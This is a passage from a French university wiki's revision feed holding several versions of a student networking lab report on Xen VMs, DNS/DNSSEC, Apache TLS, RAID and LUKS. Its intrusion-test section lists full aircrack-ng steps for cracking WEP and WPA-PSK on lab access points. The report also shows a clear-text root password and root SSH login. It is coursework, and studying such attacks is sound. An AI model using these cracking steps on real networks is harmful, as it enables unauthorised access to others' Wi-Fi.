 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n oronge-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57794</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57794"/>
				<updated>2022-01-10T17:55:57Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Réalisation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n oronge-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57786</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57786"/>
				<updated>2022-01-10T17:45:44Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Tests d'intrusions */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
